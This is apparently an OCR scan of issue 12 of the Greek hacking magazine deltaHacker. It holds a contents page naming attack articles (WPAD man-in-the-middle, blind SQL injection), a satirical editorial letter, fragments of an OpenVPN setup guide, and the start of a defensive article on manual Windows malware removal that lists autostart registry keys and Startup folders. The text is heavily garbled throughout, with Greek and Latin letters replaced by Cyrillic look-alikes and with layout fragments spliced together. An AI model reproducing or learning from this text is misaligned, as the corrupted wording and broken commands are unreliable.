12 - California Dreaming Edition | 
Lh 


i in uM. Middle a attacks, 
УЙЕ, 


y 


; εις. isque d ow στα τυφλά Й / A 


' Σχεδιά E барот για το Y | 


7 


^ 


[Ж και οδηγίες χρήσης 


ЄМТІТОріа 


νόμος δύναμης και ξυδάκι 


σνειλ НЕ! 


ο Оєїос Ακάκιος επιστρέφει στο Πόρτο Γερμενό 
-- και προβληµατίζεται 


ετρυπῶώστε та сс̧амта 


μάθετε πώς να καθαρίζετε то Windows box σας 
από malware “μόνοι” σας, 
γιατί πολύ απλά «δεν: μπορείτε να εμπιστεύεστε 
πάντα: ro antivirus 


WPAD 
Man-in-The-Middle attack 


άλλη µια περίτρανη απόδειξη του γιατί οι αυτο- 
ματισμοῖ δεν αποτελούν πάντα καλή ιδέα :S 


µετατρεύψτε rov router σας 
σε torrent downloader 


χρειάζεται να πούμε κάτι για να σας πείσουμε; 


python και wxPython: 
ανάπτυξη yia TO 
περιβάλλον γραφικὠν 


καλή η εστίαση στον αλγόριθμο, 

ueber cool η κονσόλα κειµένου, 

συχνά όµως θέλετε να ντύνετε 
κάπως διαφορετικά τις εφαρμογές σας 


επίθεση στα τυφλὰ, 
μέρος 10 


οι επιθέσεις blind SQL injection εἶναι από τις 
πλέον επικίνδυνες -- μάθετε για να µην την πάθετε 


όπου το k εἶναι θετικός ακέραιος µε 
τουλάχιστον µια ενδιαφέρουσα ιδιότητα 


εση στα τυφλα, 
μέρος 2ο 


δεν υπάρχει καλύτερος τρόπος 
για να εκτιμήσεις την επικινδυνότητα µιας επίθεσης, 
από то να την εξαπολύσεις ο ἴδιος! 
онаоа WHITE: 
breaking .net framework 


µια νέα αποστολή 
για τη δημοφιλή (;) ομάδα blackhats, 
που αυτή τη φορά έχει να κάνει 
με µια παραμυθένια χώρα... 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 
Αρχισυντάκτης Παναγιώτης Βαρελάς 
Σύμβουλοι ἐκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 


Σύνταξη Παναγιώτης Βαρελὰς, Χρήστος Βαρελάς, Ανδρέας 
Βενιέρης, Γιώργος Γιάννου, Μανώλης Κιαγιάς, Ιωάννης 
Κονιάρης, Γιώργος Μελέκος, Νίκος Μουρατίδης, Νικόλαος 
Σηφάκης, Μέσος Παπαδόπουλος (TM), Χρίστος Tóunpac 


Γραμματική επιμέλεια Βούλα Παυλίδου 


Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το περιοδικὀ deltaHacker εἶναι συνδρομητικὀ και εκδίδεται απὀ την Parabing Creations 
δώδεκα φορὲς το χρόνο, κάθε μήνα. Н Parabing Creations ἐχει την ἑδρα της στη Μαιώτιδος 
3, 55 133, Καλαμαριά. Н εκτύπωση και η βιβλιοδεσία γίνονται απὀ την ThessPrint Α.Ε. То 
email επικοινωνίας rou περιοδικού εἶναι то talk2us@deltahacker.gr και ro email για τις 
συνδρομές ro subscriptionsGdeltahacker.gr. Οι πληροφορἱες yia τις συνδρομὲς εἶναι στο 
http://deltahacker.gr/subscriptions και οι παραγγελίες γίνονται anó ro http://deltahacker. 
gr/order. Όλες οι απόψεις που εκφράζονται στα άρθρα δεν εκφράζουν απαραίτητα και τη 
γνώμη του περιοδικού. 


(5) Όταν ένα αστέρι πέφτει, ένας μαθηματικός κάνει µια f(x) 
[ κλεμμένο από το twitter кол συγκεκριµένα από την ()marilouJD 


-- follow και πείτε ένα γεια” κι από εμάς! | 


Εσείς ανανεώσατετη συνδρομὴ σας, 
nou αυτόν το µήνα λήγει; 


Ἕνας χρόνος πέρασε χωρίς να το καταλάβουμε και 12 τεύχη μετὰ 


ετοιµαζόμαστε να yioprácouue та прота γενεθλια του 
πολυαγαπημένου µας περιοδικού! Πα εμάς, δεν υπάρχει καλύτερος 
τρόπος εορτασμού апо то να σχεδιάζουμε ro пос μπορούμε να 
βελτιώσουμε το deltaHacker, µε ακόµα πιο ενδιαφέροντα 


αλλά και διασκεδαστικἀἁ θέµατα 


Σ' ὁλη αυτή την πορεία δεν θα та εἰχαμε καταφέρει χωρίς τη 


φανατικήἠ σας στήριξη. Σας ευχαριστούμε ү" ауто και 
σας υποσχόμαστε бт! στη νέα σεζὀν θα ἐχετε ακόμα περισσότερους 
λόγους να χαἰρεστε για την επιλογἠ σας ма µας ornpicere! 


Ως ελαχιστότατο "ευχαριστώ", yia TO µήνα Σεπτέμβριο προσφέρουμε 
εκπτωση 50/0 cni της κανονικἠς τιμής, σε όσους ανανεώσουν 
τη συνδρομή τους µε véa 1.2µηνη ἡ 24µηνη. 


Πα va εκµεταλλευτεῖτε την ἑκπτωση TOU 5% αγοράστε τη 


12unvn ἡ 24µηνη συνδρομή σας ἕως και την 1/10/2012, 
συμπληρώνοντας τη φόρμα παραγγελιὼν ото 


http://deltahacker.gr/order 


аі fights reversed 


WV HACKER 


SUPPE, 


ж ж e X Sr cR EVO ROO DS ьо 


| Νόμος δύναμης και ξυδάκι | 


vovv v 


Ф 
e 
e 
e 
ο 
€ 
e 
e 


9 о с 9.059. 9. 


9-фидгдьдувчене она 
Z 


6 


8 
& 
2 
5 
ἃ 
H 

E 
Н 
E 
5 
ES 


Αγαπητοί µου, d - 


Επιτέλους καλοκαίρι! Μετά από δύο μήνες εκλογικής καν μετεκλογνκής 
εγρήγορσης, και μερικές βροχερές βδομάδες στην Γηραιά Αλβιώνα, έχω 
πλέον επιστρέφει στη βάση μον, στο Πόρτο Γερμενό. E γραφομηχανή είναν 
αχονμπισμένη στον ξύλινο πάγκο δίπλα алб τη µεγάλη ανώρα στην αυλή καν 
εγώ Еўро, καθισμένος μπροστά της και πατάω πλήκτρα. 

Μοιάζει σαν να µην ÉXEL περάσει οὔτε шо μέρα από πέρσι, πον καθισµέ- 
νος мом πάλι στην ἴδια ακριβώς θέση ξεκίνησα να σας γράφω τις μηνιαίες 
μου επιστολές. 

Καν όµως έχουν περάσει έντεκα µήνες, καν αυτή τη στιγµή ζεκυνώ την 
δωδέκατη επιστολή μον. 

Δεν σκοπεύω να κάνω ανασκόπηση της χρονιάς. Λυτό θα το κρατήσω για 
την επόμενη φορά. Αλλά πάπονες μελαγχολικές σκέφεις δεν μπορώ να τις 
αποφύγω. 

Μελαγχολικές ὀχν τόσο για το γεγονός πως o χρόνος περνάει -"πετάεν", 
θα έγραφε ο ποιητῆς- όσο για το βάρος της μνήμης. 

Τέλος πάντων, ας µην σας χαλάω το KÉL τώρα, χρονιάρες μέρες, οπότε 
let's stick to the facts: To παλοκαίρι εἶναι εδώ, όλα είναν πολύ ήρεμα 
καν ειδυλλνακά, καν όλον ποιυμούνταν умо. μεσημέρι, µε την εξαίρεση των τζι- 
τζνκνών που (όπως καν πέρσι) κοντεύουν να πάθουν αποπληξία από το πολύ 
τόν τόν. 

Έχει πλάκα αυτό µε τα τζντζίκνα. Για µας που είµαστε μόνιμα στην Ελ- 
λάδα, ο ήχος τους δεν µας κάνει мам µεγάλη εντύπωση. Τζιτζύκνα παν παλο- 
майру πάνε µαζί. Гео, όλους τους εντός, ωστόσο, αυτούς που επισκέπτονταν 
την Ελλάδα όταν παν όποτε, τα τζιτζίκια εἰναν πάτν το απρόσμενο καν πα- 
ράξενο. Γνα όλους τους Έλληνες, τέλος, που μένουν εντός Ελλάδας, τα τζι- 
τζίκνα είναι το πρώτο πράγμα που νοσταλγούν όταν φτάνει το καλοκαίρι. 
Αυτό, τουλάχιστον, μου εκμυστηρεύεται ο ανιφιός. 

Ex&( στα Λονδίνα, µου λέεν, ειδικά όταν ο καιρός είναν καλός (η έµφαση 
εδώ πάει στο "όταν"), αυτό είναι που του λείπει περισσότερο, о ήχος των 
τὂντζνκιών. 

Τζιτζίκνα, λονπόν. 

Στο Πόρτο Γερμενό δεν έχουμε (утєруєт, όπως ίσως θυμάστε, мам έτσν 
ἔχω χάσει την άµεση επαφή µου µε τον έξω κόσμο. E Μαιρούλα έχεν το 
ἀνθόν της, βέβαια, καν κάθε βδομάδα πον ανεβαίνεν στα Βίλνα yra φώνια 
ενημερώνεται για την επικαιρότητα, καν µας ενημερώνει xv εμάς επιστρέφο- 
ντας. 

Πήγαν και σήμερα το πρωί µε την Κυρία Καίτη, καν γύρισαν γεμάτες νέα. 


Σνέιλ μέιλ 
Αα 


Έτσι το έχω μάθει, ας πούμε, бт ο Ισημερινός έδωσε επἰ τέλους ἁσυ- 

Хо στον Ασάνζ ἡ ότι στην Ύδρα ον εστιάτορες κήρυξαν νέο Ανένδοτο κατά 
του ZAOE καν της Αστυνομίας. Επίσης έχω µάθεν оту στην Χίο καίγονται και 
τα τελευταία δάση που τους έχουν απομείνει -είδα, μάλιστα, καν σχετική 
φωτογραφία µε κάτι χωρικές σε µια παραλία, όρθιες δίπλα απὀ τις ξαπλώ- 
στρες καν τους λοιπούς λονόμενους, να ποντάζουν την φωτιά να πλησιάζει 
сло το δάσος πιο κάτω. Έμαθα xav για την συνεχιζόµενα πτωτική πορεία 
της μετοχής του Ζούπερμαν και φυσικά άκουσα τα πάντα ума тоу Βένιο Δία, 
την εμπνευσμένη επιχείρηση της αστυνομίας µε το εὔστοχο буора. 

Για τον Ασάνζ τι να πω; Με βάζει σε σκέφεις, βέβαια, το γεγονός ότι του 
δίνει άσυλο умо, дуам υπόθεση σεξουαλικής παρενόχλησης η πρεσβεία µιας 
χώρας µε κυβέρνηση που καταδικάζει δημοσιογράφους για τα κείμενά τους 
καν κλείνει εφημερίδες επειδή έκαναν αντιπολιτευτικά σχόλια. Κάτι роо λέεν 
ότι η «νίκη» του δεν είναν απλώς νίκη της ελευθεροτυπίας καν της ελευθε- 
ρίας στην πληροφόρηση. Από την άλλη, σε σκέφεις µε βάζεν και το γεγονός 
оту ον Σουηδοί θυμήθηκαν την υπόθεση της παρενόχλησης μόλις αυτός ξεκί-- 
νησε τις αποκαλύφεις τον. Οπότε τι; 

Δεν έχω ιδέα. 

Ούτε για την Ύδρα έχω να πω πολλά. Ξέρετε, τους καταλαβαίνω. Έχετε 
πάει στην Ύδρα; Ov άνθρωπον πεννάνε. Στα κοσμηµατοπωλεία παν τις μπουτίκ 
σκοτώνουν μύγες για να περάσει η ώρα. Н κίνηση сло Ἰαπωνία мам Σαουδική 
Αραβία είναι πεσμένη φέτος, καν από τα προνυαζιερόπλοια που προσδένουν 
στο λυμάνν, ον τουρίστες που κατεβαίνουν αρχούνται να φωτογραφίζουν τις 
γάτες καν αποφεύγουν πλέον να κάτσουν µε φόντο το ηλιοβασίλεμα για να 
παραγγείλουν µια ντοματοσαλάτα των δώδεκα ευρώ καν έναν απλὀ εσπρέσο 
των πέντε. 


Χώρνα που φέτος στο νησί δεν έχει πατήσει ούτε ένας Γερμανός, καν ον 
ντοματοσαλάτες έχουν μείνει απούλητες. 

Προφανώς υπακούουν στις εντολές της Μέρκελ. Ер, Γερμανοί είναν, τι 
περιμέναμε. Δεν τους ξέραμε ба; Πειθήνιον. Μαλθανοί. Ταπεννωμένου,. Όχν 
σαν τους ηρωυκούς τους Υδραίους που όπως τότε, στα ηρωικά 
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χρόνια του εινκοσιένα, έτσι και σήµερα, μύγα στο σπαθί τους δεν ανέχονταν 
καν χαράτσια στον Σουλτάνο δεν πληρώνουν. Τίποτα δεν πληρώνουν. Axóyo 
καν διόδια να υπήρχαν στην Ύδρα, обтє αυτά θα τα πλήρωναν. 


Οπότε σιγά µην τον πληρώσουν τον φπα στα δώδεκα ευρώ της ντοµατο- 
σαλάτας. Ἡ στα πέντε ευρώ του εσπρέσο. 


Ας τον πληρώσουν ον άλλον. Ας τον πληρώσουν ον Γερμανοί. Αυτοί δεν 
παράγγειλαν την ντοµατοσαλάτα; Λυτοί να πληρώσουν. Δηλαδή τι, μαζί την 
φάγαμε му αυτής Νισάφν! 

Όπως καν στη Χίο. Εμείς θα σβήσουμε τις φωτιές; Ένα µήνα τον έχουµε 
να δουλέφουμε ума να βγάλουμε όλη τη χρονιά, θα αφήνουμε τα μαγαζιά. 
για να τρέχουμε στα κατσάβραχα µε τα χατζάρια καν τις µάνικες} Καν στο 
κάτω κάτω, τν κάνει το κράτος; Γιατί τους έχουμε εκεί; Για διακοσµητι- 
κπούς; Να πάρεν ο Πολύδωρας την κόρη του να πάνε αυτοί να σβήσουν τη 
φωτιά. Εμείς έχουμε και δουλειές. 

Για тоу Ζούπερμαν, τέλος, TL άλλο να πω; Н µετοχή πέφτει, ох. Θα πέσεν 
му άλλο, ох. Μεσ' στην θερινή ραστώνη καν απομόνωση του Πόρτο Γερμενού, 
т µετοχή τον Ζούπερμαν είναν χαμηλά. στην ιεραρχία των πραγμάτων που µε 
απασχολούν. Πολύ χαμηλά. 

Όσο χαμηλά είναν καν πάθε TL άλλο. Οφείλω να το παραδεχτώ. Στην 
πραγματικότητα τίποτα δεν µε απασχολεί. Έχω παραδώσει τα όπλα. 

Σας έγραφα τις προάλλες ума τα Χρυσά Αβγά. Ίδρωσε το αφτί κανενός; 
Κανενός. Προβληματίστηκε κανείς για τα μαχαινρώματα που έχουν γίνεν 
καθημερινή υπόθεση» Κανείς. Πνάσανε κανέναν ума. τα μαχαιρώματα αυτά; 
Κανέναν. To μόνο που πιάνουνε, δηλαδή τν πιάνουνε, τους μαζεύουνε µε TO 
παραγάδν, εἶναι κάθε τν μελαμφό που πινείταν στην ευρύτερη περιοχή πρω- 
τευούσης καν άλλων πόλεων. 


Пор λέτε, μεγάλη επιτυχία ο Ξέννος Ζευς. Από τους 10502 που προσή- 
χθησαν, µε ενημερώνει η Κυρία Καίτη, ov 1941, λέει, δεν είχανε χαρτιά καν 
συνελήφθηκαν. Δηλαδή παρανομία σε ποσοστό 18,22. Н, για να το θέσω αλ- 
ALUC, νομιμότητα σε ποσοστό 81,5%. 

Με ρώταγε αν αυτό είναν επαρκές ποσοστό για να δικαιολογήσει την 
έκταση (καν το ύφος) της επιχείρησης; Ξέρω үш; Πείτε μου εσείς. 

Για να το θέσω καν µε πιο abstract τρόπο, δικανολογείταν η οργάνωση 
εστιασµένων επιχειρήσεων «σπούπας» εναντίον τμημάτων ενός πληθυσμού 
όταν η παραβατικότητα δεν φαίνεταν να ξεπερνά το 20%; 

Εγώ δεν ξέρω τι να σκεφτώ. 

Γιατί αν σκεφτώ ότι ναι, εἶναι δικανολογημένη, τότε θα πρέπεν να δηλώ- 
σω εθελοντής καν να πάω στη Λευκάδα για να μαζέφω µε το παραγάδν κάθε 
τν που ишете καν παρέχει τουριστικές υπηρεσίες. Κάθε τι. Από εστιάτορα 
μέχρν γάτα. Καν µετά να πάω στην Ύδρα. 


Διότι, όπως µε πληροφορεί η μητέρα της Βξαδέλφης που είναν Ἰνδονί- 
στρνα, σύμφωνα µε το ΣΔΟΕ στη Λευκάδα η σχετική παραβατικότητα ανέρ- 
χεταν στο 1000. 


Να, τώρα, όπου να' VaL ξυπνάει απὀ τον μεσημεριανό υπνάκο, xav θα єр- 
θεν να σας το πει η ἴδια. 


Καν βγάλτε σείς τα συμπεράσματά σας. Βγώ σας το είπα από την αρχή. 
Δεν έχω ιδέα. Και обтє που µε ενδιαφέρει. 


Αν δεν σας ενδιαφέρει εσάς. 


Σας ασπάζομαι, 
θείος Ακάκιος 
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OpenVPN ото FreeBSD: Εγκατ 


deltahacker.gr, 


Ἐντοτεικρομο τη-σεσιΓτου UPEN PPUT: 


я whereis openvpn V. deltaHacker 

openvpn: /usr/ports/security/openvpn 

Καλημέρα και καλή βδομάδα σε όλου 

Μεταβαίνουμε στον κατάλογό του. 5 

Kai vat, о @Petrarakos ἔχει το editoris 
# cd /usr/ports/security/openvpn του дейаНаскег 012! Αυτή τη φορά έχει και 
σχηματάκι, ενώ μάλλον θα πιάσει μια σελίδα 


κι εγκαθιστούµε δίνοντας παραπάνω, 


To editorial του deltaHacker 012 
ελέγχεται "тра" από την Ὑπεύθυνο Γραμματικής 
ч Ἐπιμελείας του περιοδικού, aka @Citr0nella 

Στο text dialog box που εμφανίζεται αφήνουμε τις προεπιλογές (απλά πατάμε το [Enter]). Н διαδικασία Coming 


της µεταγλώττισης ενδέχεται να διαρκέσει αρκετά λεπτά. Υπομονή, 


8 make install clean 


зенан яте nnisritchie long liv 
ou omae the King Bh” 
зейан > ду ένα, αλλά δύο ἄρθρα yia to 
Πιστοποιητικά καὶ κλειδιά үн server τεύχος 0131 Μιλάμε, ο άνθρωπος εἶναι πολύ 
Το αρχείο ρυθμίσεων του OpenVPN, καθώς κι ορισμένα απαραίτητα πιστοποιητικά και κλειδιά, θα | μπροστά (και σίγουρα σε κάποια μυστική συμφωνί 
μετον @ ) 


αποθηκευτούν κάτω алб τον κατάλογο /ustllocalletc/openvpn. Αυτός δεν υπάρχει ακόµα yı" αυτό και 
τον δημιουργούμε — μαζί µε τον υποκατάλογό του ονόματι easy-rsa: 


# mkdir -p /usr/local/etc/openvpn/easy-rsa m 


Μεταβαίνουµε στον /usr/localletc/openvpn/easy-rsa, αντιγράφουµε εκεί µέσα τον umokaráAoyc 
του /usr/local/share/doc/openvpn/easy-rsa κι αλλάζουμε a" αυτόν, 


# cd /üsr/1ocal/etc/openvpn/easy-rsa 
# cp -R /usr/local/share/doc/openvpn/easy-rsa/2.0 . 
# cd 2.0 


Ανοίγουμε то αρχείο vars µε κάποιον text editor {π.Χ., µε то па 
8 nano vars 


Προς το τέλος του αρχείου τροποποιού, 
χρησιμοποιηθούν kc 
π.χ., Éva тараб 


export К 
export 
export 
expor 
expe 


$5/mo. Virtual Servers 
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|dev/random 


addenda btp γη 


re canned 


зігеа 


Абук δημοσιεύσεων 
Γενικό прорії 
Προφίλ στο forum 
Αποσύνδεση 


Hn | 
ва 009004 Summer 2012 ἐλ, 
"ων που παρήγγειλαν эд 
ονόματά τους μόνο - 
елу : 


ώση των πέντε τυχερών 
Ανακοινώνουμι 
© τοῦ emi) 


ν μεταξύ 
е εδώ τα 
н Ba τους 


Ὁ μικρό καν το орук, 


ερώσοι К προσωπικά, μέσῳ em 
ULE και προσωπι μέσω ета 


και 
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ashes cracking 
ME σε сот 


Πλήρη άρθρα που συμπληρώνουν το περιοδικό. Ta εβδομαδιαία µας 
video casts [έρχονται, έρχονται]. Ολόκληρα blasts from the past. 
Τα βίντεο από τα live streams. Та πάντα ενδιαφέροντα forums. To 


σημείο συνάντησης για τους φίλους του περιοδικού. Н πιο ζωντανή 
κοινότητα και oi πιο ανήσυχοι, δημιουργικοῖΐ χρήστες | 


deltahacker.gr 


What have you hacked for me lately? 


) 
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Δεν σκοπεύουµε va σας κουράσουµε µε ша ανούσια φιλολογική συζήτηση 
γύρω απὀ ro malware. Δεν πρὀκειται να περιγράψουμε τα διάφορα εἰδη 
του, οὐτε θα επιχειρήσουμε να δώσουμε буора σε ká8e εἶδος (όπως npo- 
σπαθούν να κάνουν πολλοί). Αυτό που µας ενδιαφέρει εἶναι va yvopicou- 
µε και να εξετάσουμε τα ботіка σημεία ενὸς συστήματος Windows, στα 
οποία επιτίθενται τα περισσότερα malware (viruses, worms κι οτιδήποτε 
алло περνάει anó то vou σας). Επιπρόσθετα, θα αναφέἑρουµε και μερικούς 
τρόπους µε τους onoiouc μπορούμε ν΄’ ανακαλύπτουμε malware που ἐχει 
χωθεἰ στο сбстпна µας, καθὼς kai το пос μπορούμε va то απομακρύνου- 
με. Όλα αυτά θα та κάνουμε χειροκίνητα, ҳоріс̧ την χρήση αντιβιοτικών” 
ἡ “καθαριστικὠν” προγραμμάτων. Όχι бт! σας προτείνουμε να µην ἐχετε 
antivirus ἡ кат! παρόμοιο, αλλά σε κάποιες περιπτώσεις τα προγράμματα 
του εἰδους αποδεικνύονται ανεπαρκἠ, οπότε οφείλουμε να γνωρίζουμε 
πὼς м" αναλαμβάνουμε δράση. Στην παρουσἰασἠ µας θα θεωρήσουμε бт! 
το σύστημα που δέχεται επίθεση εἶναι ἑνα box µε Windows 7. Αυτὸ βέβαια 
δεν πρέπει να αγχώσει τους παραδοσιακούς χρήστες. Оса θα δούμε ισχύ- 
ουν και στην περίπτωση rov Windows ΧΡ και των Vista. Πριν ξεκινήσου- 
με, va ξεκαθαρἰσουμµε оті δεν πρὀκειται να παρουσιάσουμε κάποια μαγικἠ 
συνταγἠ. Δεν πρὀκειται να δώσουμε va φάρμακο για την αντιμετώπιση 
όλων των malware. То μόνο σίγουρο ὁμως εἶναι ότι θα παρουσιάσουμε 
όλα боа πρέπει να γνωρίζει κανείς, yia να ξεκινήσει τον ἐλεγχο και τον 
καθαρισµὀ rou сустпнатос του. 


Τρωτά σηµεία 


Ποια µέρη του συστήµατος προτιμούν τα περισσότερα malware; Па va 
απαντήσουμε о’ αυτὸ το ερώτημα, πρέπει прота va μελετήσουμε τη OU- 
μπεριφορά που παρουσιάζουν αυτά τα προγράμματα. Σ’ αυτή τη μελέτη 
θα επικεντρώὠσουµε την προσοχἠ µας σε δύο βασικἁ στοιχεία της συμπε- 
ριφοράς rou malware: 


ο Στον упхаміснд µε rov οποίο εκτελούνται Χαφού3ᾶ εγκατασταθούν 
στο σύστημα. 


ο Στην περιοχή rou δίσκου, στην οποία επιλέγουν να εγκατασταθούν. 


Να τονίσουμε ὁτι, τουλάχιστον с’ αυτὸ το ἀρθρο, δεν θα ασχοληθούμε 
καθόλου µε rov τρόπο διείσδυσης του malware σ΄ ¿va σύστημα. Τις περισ- 
σὀτερες φορὲς πρὀκειται για κἄποια αδυναμία zero-day του λειτουργικού 
συστήματος ἡ κάποιου ἄλλου προγράµµατος (π.χ., του Firefox, rou IE, 
κ.ο.κ.). Εμείς θα ασχοληθούμε µε όσα συμβαίνουν *иєта* апо µια επιτυ- 
χημένη εισβολἠ. Αυτή τη фора, το θέμα µας εἶναι να καταπολεμήσουμε 
το εγκατεστημένο malware κι ὀχι να κλείσουμε τις τρύπες TOU συστήμα- 
τος ἡ ἄλλων εφαρμογών. 


Μηχανισμός εκκίνησης 


Πρέπει να ξέρετε бт! το malware ἐχει αρκετά κοινά χαρακτηριστικἁ µε 
τα “апла” προγράμματα. Αυτά τα ηλεκτρονικά ζιζάνια εἶναι προγράµµατα 
σαν òda τ’ ἄλλα, ὁπως то Word, ro Excel και пає! λέγοντας. Па va eni- 
τελέσουν το κακόβουλο ἐργο τους, πρέπει κάποιος ма τα ενεργοποιἠσει. 
Μ΄’ алла λόγια, κάποιος πρέπει να τα τρέξει. Κάπου εδὠ εντοπίζεται ἑνα 
βασικὀ τρικ που πραγματοποιούν τα προγράµµατα rou εἶδους: Τρέχουν 
роуа τους! Χμ, εντάξει, σχεδὸν μόνα τους. Όπως с’ όλες τις επιστήμες, 
ἐτσι και στην πληροφορικἠ τίποτα δεν γίνεται! µε µαγικὀ τρόπο. Κανένα 
πρόγραμμα δεν µπορεί va τρέξει «апо μόνο του». Στην πραγματικότητα, 


Ξετρυπώστε τα ζιζάνια! 
LLL 


то malware εκτελείται συνήθως апо κάποιον упуамісно αυτόματης єккі- 
νησης, τον οποίο φέρει ro λειτουργικὀ σύστημα (Σ.τ.Ε. Άλλο πρόγραµµα 
ауто. E, ті, να µην προσθέσω *ki £00* κάτι; :D) Μάλιστα, τα περισσότερα 
προγράμματα rou εἰδους προτιμούν να εκτελούνται ακριβώς µετά την 
εκκίνηση του λειτουργικού. Αυτό упореї να γίνει µε διάφορους τρόπους 
кт о συνηθέστερος σχετίζεται µε ro registry των Windows. Συγκεκριμένα, 
στο registry υπάρχουν µερικάἀ κλειδιά, των οποίων οι καταχωρήσεις EKTE- 
λούνται αυτόματα. Πα παράδειγµα, δείτε τα ακόλουθα: 


НКЕУ LOCAL MACHINENSOFTWARE Microsoft WindowsNCurrentVersionNRun 
HKEY LOCAL. MACHINENSOFTWAREM Microsoft WWindowsNCurrentVersionNRunOnce 


Οτιδήποτε καταχωρηθεἰ “κάτω” апо αυτά ra κλειδιά, αντιμετωπίζεται σαν 
νόμιμο πρὀγραμμα και καλεῖται αυτόματα, µετά апо кабє εκκἰνηση του 
λειτουργικού συστήµατος. Τα παραπάνω κλειδιἁ αφορούν σε ὀλους τους 
χρήστες του λειτουργικού, αφού βρίσκονται κάτω апо το LocalMachine. 
Δώστε προσοχή στο κλειδὶ RUN. Αντίστοιχα κλειδιά υπάρχουν για κάθε 
χρήστη ξεχωριστά, κάτω апо то ΗΚΕΥ CURRENT USER, αλλά και για 
τον λεγόμενο default user, като апо το HKEY ОЅЕКЅ\.РЕҒАОІТ\. Εκτός 
апо ro registry, τα Windows περιλαμβάνουν κι ἄλλους μηχανισμούς για 
την αυτόματη єккіупоп προγραμμάτων. Το σύστημα ελέγχει κι ορισμένες 
τοποθεσἰες στο δίσκο, ὁπως οι ακόλουθες: 


C: \ProgramData\Microsoft\Windows\Start MenuNProgramsNStartup 
С: \Users\<USER-NAME>\AppData\Roaming\Microsoft\Windows\Start 
Menu\Programs\Startup 


Εκεἰ εἶναι δυνατὸ να βρίσκονται διάφορες συντομεύσεις προς проүрӣр- 

ната, ra onoia εκτελούνται αυτόματα ката το λεγόμενο startup των 

Windows. Όπως µπορείτε να καταλάβετε, το registry του συστήματος και 

οι κατάλογοι που αναφέραμε παραπάνω αποτελούν κλασικὲς τοποθεσἰες , Εικόνα 1 
і i i У r * Н Από την καρτέλα 

στις οποίες τρυπώνουν τα κακόβουλα προγράμματα. 2" αυτὸ το σημείο, μα... 

για λόγους πληρότητας πρέπει να αναφέρουμε τα αρχεία C:\Windows\ ο ποια 

Win.ini και C:NAutoexec.bat. Αυτά διαβάζονται ката την εκκίνηση TOU μπορούμε να δούµε 


λειτουργικού και, μεταξύ ἄλλων, μπορούν να εκτελούν ἄλλα проүранна- ποια προγράμματα 
τα. Επομένως, ἑνα πρὀγραµμμα malware θα μπορούσε να προσβάλλει та ξεκινούν αυτόματα, 
εν λόγω αρχεία, oore να εξασφαλίσει την αυτόματη εκκἰνησή του. ката την EKRIVITOT] 
VO MN “νῷ n Heen non του λειτουργικού 
συστήµατος. 


Πρώτη αντίδραση 


. , : Р 6 = 2 zT 
Av υποπτευόµαστε бт! το σὐστημά КК LR 
μας xei μολυνθεί апо malware, General | Boot | services | Startup | Tools | 

τότε οφείλουμε va ξεκινήσουμε ce ..------. 

τσεκάροντας τα προγράμματα που [V] Synaptics Pointing Devic... Synaptics ἴπεο...  %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe 

Н я 5 [V] Microsoft IntelliPoint Microsoft Corp... "c:\Program Files Microsoft IntelliPointlipoint.exe" 
εκτελούνται auropara. па то око [V] ESET Smart Security ESET "C: Program Files|ESETYESET NOD32 Antivirus legui.exe" 
πο αυτο μπορουμε va τρέξουμε ΤΟ V] Google Update Google Inc. "C:lUsersVthiseas AppData VL ocalGoogle Update (Google. 

а S el - V] Virtual CloneDrive Elaborate Byte... "C:\Program Files (x86) Elaborate Bytes VirtualCloneDriv 
εργαλείο msconfig και va μετα W| KeePass Dominik Reichl "C:\Program Files (x86) KeePass Password Safe 2 KeePa| | 
βούμε στην καρτέλα Startup (BA. V] VMware Workstation VMware, Inc. "C: Program Files (x86) WMware VMware Workstationlvn 
εικόνα 1). Екєі θα αναζητήσου- 
µε παράξενες εγγραφές. Δηλαδή, 
προγράμματα nou ἐχουν εντελώς 
άγνωστο ὀνομα, παράξενο ἡ апла А Ш - : 
ὑποπτο! Ката πάσα πιθανότητα, Ένας al μα σπα 
το проураниета поре хеме. duta mI» 
та  уарактпрістіка αποτελούν 


1. Στο ἰδιο εργαλείο καταλήγουμε και µε την εξἠς διαδρομή: Start > Control Panel > Administrative Tools > 
System Configuration. 


Eikóva 2 

To δωρεὰν єр- 
γαλείο Starter 
προβόλει όλα та 
προγράμματα nou 
ξεκινούν айтдиа- 
τα, dOXETG αν о! 
σχετικές αναφορές 
έχουν προστεθεί 
στο registry rj σε 
κάποιον κατάλογο 
αυτόματης εκκίνη- 
σης. Arió το ἰδιο το 
Starter μπορούμε 
va απενεργο- 
ποιήσουμε την 
αυτόματη εκκίνηση 
ενός проурариа- 
τος και, εφόσον 

το επιθυμούμε, 

να διαγράψουμε 
πλήρως και τη 
σχετική αναφορά 
στο registry του 


WV'HAGIKER 


ÁN 


malware. Ас το &&nyrjicouus Ліүо αυτό: Προφανώς, ká6e πρόγραµµα np£- 
πει να ἐχει ἑνα ὀνομα. Οἱ προγραμματιστές του malware, λοιπὸν, δίνουν 
τυχαία ονόματα στα προγράµµατα τους, τα οποία δημιουργούνται αυτό- 
рата και δεν εἶναι πάντοτε ra ἴδια. О λόγος yia том onoio γίνεται αυτό 
εἶναι η απὀκρυψη. Αν κάποιο malware εἶχε πάντοτε ro ἰδιο ὀνομα, 0a 
ἠταν πολύ εὐκολο να εντοπιστεἰ апо ἑνα πρὀγραµµα καθαρισμού, ὁπως 
επἰσης κι апо τους ἰδιους τους χρήστες. Έτσι, πολλοὶ δημιουργοί χρησι- 
μοποιούν ονόματα που αποτελούνται апо ша σειρἁ τυχαίων χαρακτήρων 
(π.χ., sdfhgjd.exe). Κάποιοι ἄλλοι ακολουθούν εντελώς διαφορετικἠ Ta- 
κτική: Επιλέγουν ονόματα υπεράνω πάσης υποψίας, όπως, n.x., msword. 
exe, systemio.exe κ.ο.κ. Σ’ αυτὲς τις περιπτώσεις χρειάζεται περισσότερη 
προσοχή. Πα παράδειγµα, αν βρούμε στην αυτόματη εκκἰνηση την εγγρα- 
Фй C:NWWindowsWmsword.exe, το πιο πιθανότερο εἶναι va µην πρὀκειται 
για το γνήσιο MS Word αφού αυτὀ δεν εγκαθίσταται στον βασικὀ ката- 
λογο του συστήματος, αλλά σε ціа поло συγκεκριμένη θἐση µέσα στο 
Program Files. Από την ἄλλη, αν κι ἐχει yaporikó ὀνομα, το systemio.exe 
εἶναι εντελὠς ἄγνωστο! Βέβαια ἑνας ἐμπειρος χρήστης γνωρίζει оті δεν 
